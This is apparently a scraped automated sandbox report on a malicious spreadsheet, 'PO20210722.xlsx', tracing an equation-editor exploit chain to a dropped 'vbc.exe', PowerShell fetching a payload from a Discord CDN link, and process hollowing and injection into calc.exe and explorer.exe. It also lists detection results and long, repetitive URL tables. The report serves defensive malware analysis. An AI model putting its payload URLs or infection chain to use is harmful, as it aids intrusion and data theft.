          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452643 Sample: PO20210722.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 42 google.com 2->42 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Multi AV Scanner detection for dropped file 2->60 62 12 other signatures 2->62 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 32 2->16         started        signatures3 process4 dnsIp5 46 172.245.119.43, 49165, 80 AS-COLOCROSSINGUS United States 11->46 36 C:\Users\user\AppData\Local\...\obi[1].exe, PE32+ 11->36 dropped 38 C:\Users\Public\vbc.exe, PE32+ 11->38 dropped 86 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->86 18 vbc.exe 11->18         started        40 C:\Users\user\Desktop\~$PO20210722.xlsx, data 16->40 dropped file6 signatures7 process8 signatures9 50 Multi AV Scanner detection for dropped file 18->50 52 Obfuscated command line found 18->52 54 Very long command line found 18->54 21 powershell.exe 4 16 18->21         started        process10 dnsIp11 44 cdn.discordapp.com 162.159.130.233, 443, 49166 CLOUDFLARENETUS United States 21->44 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->64 66 Writes to foreign memory regions 21->66 68 Injects a PE file into a foreign processes 21->68 25 calc.exe 21->25         started        signatures12 process13 signatures14 70 Modifies the context of a thread in another process (thread injection) 25->70 72 Maps a DLL or memory area into another process 25->72 74 Sample uses process hollowing technique 25->74 76 2 other signatures 25->76 28 NAPSTAT.EXE 25->28         started        31 explorer.exe 25->31 injected process15 dnsIp16 78 Modifies the context of a thread in another process (thread injection) 28->78 80 Maps a DLL or memory area into another process 28->80 82 Tries to detect virtualization through RDTSC time measurements 28->82 34 cmd.exe 28->34         started        48 www.jewelryengravings.com 31->48 84 System process connects to network (likely due to code injection or exploit) 31->84 signatures17 process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO20210722.xlsx29%VirustotalBrowse
          PO20210722.xlsx28%ReversingLabsWin32.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe46%VirustotalBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe20%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe57%ReversingLabsWin64.Spyware.Noon
          C:\Users\Public\vbc.exe20%MetadefenderBrowse
          C:\Users\Public\vbc.exe57%ReversingLabsWin64.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          11.2.calc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.google.com.br/2%VirustotalBrowse
          http://www.google.com.br/0%Avira URL Cloudsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.google.com.tw/0%VirustotalBrowse
          http://www.google.com.tw/0%Avira URL Cloudsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%VirustotalBrowse
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          google.com
          		216.58.215.238
          		truefalse
            		high
            cdn.discordapp.com
            		162.159.130.233
            		truefalse
              		high
              www.jewelryengravings.com
              		unknown
              		unknowntrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.google.com.br/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://search.chol.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                  		high
                  http://www.mercadolivre.com.br/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.merlin.com.pl/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://search.ebay.de/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mtv.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.rambler.ru/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.nifty.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.dailymail.co.uk/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www3.fnac.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://buscar.ya.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://search.yahoo.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.sogou.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://asp.usatoday.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    https://cdn.discordapp.com/attachments/858793322087710753/86389185760801590powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://fr.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        https://cdn.discordapp.com/attachments/858793322087710753/863891857608015902/oad.jpgpowershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpfalse
                                          		high
                                          http://rover.ebay.comexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://in.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://search.ebay.in/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://%s.comexplorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		low
                                                  http://msk.afisha.ru/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.google.com.tw/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://search.rediff.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://www.windows.com/pctv.explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.ya.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.etmall.com.tw/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://it.search.dada.net/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://search.naver.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://www.google.ru/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.hanafos.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.daum.net/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://search.naver.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://buscar.ozu.es/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://kr.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.about.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://busca.igbusca.com.br/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.ask.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.cjmall.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://search.centrum.cz/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://suche.t-online.de/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.google.it/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://search.auction.co.kr/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.ceneo.pl/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.amazon.de/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000C.00000000.2232348196.000000000B320000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://sads.myspace.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://cdn.discordapp.com/attachments/85879332208771075powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://google.pchome.com.tw/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://uk.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://search.sify.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://search.ebay.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.gmarket.co.kr/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://search.nifty.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://searchresults.news.com.au/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.google.si/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cdn.discordapp.com/attacpowershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.google.cz/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.soso.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.univision.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://search.ebay.it/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://busca.orange.es/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.target.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.interpark.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://clients5.google.com/complete/search?hl=explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://investor.msn.com/explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://search.espn.go.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.myspace.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://search.centrum.cz/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        		high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
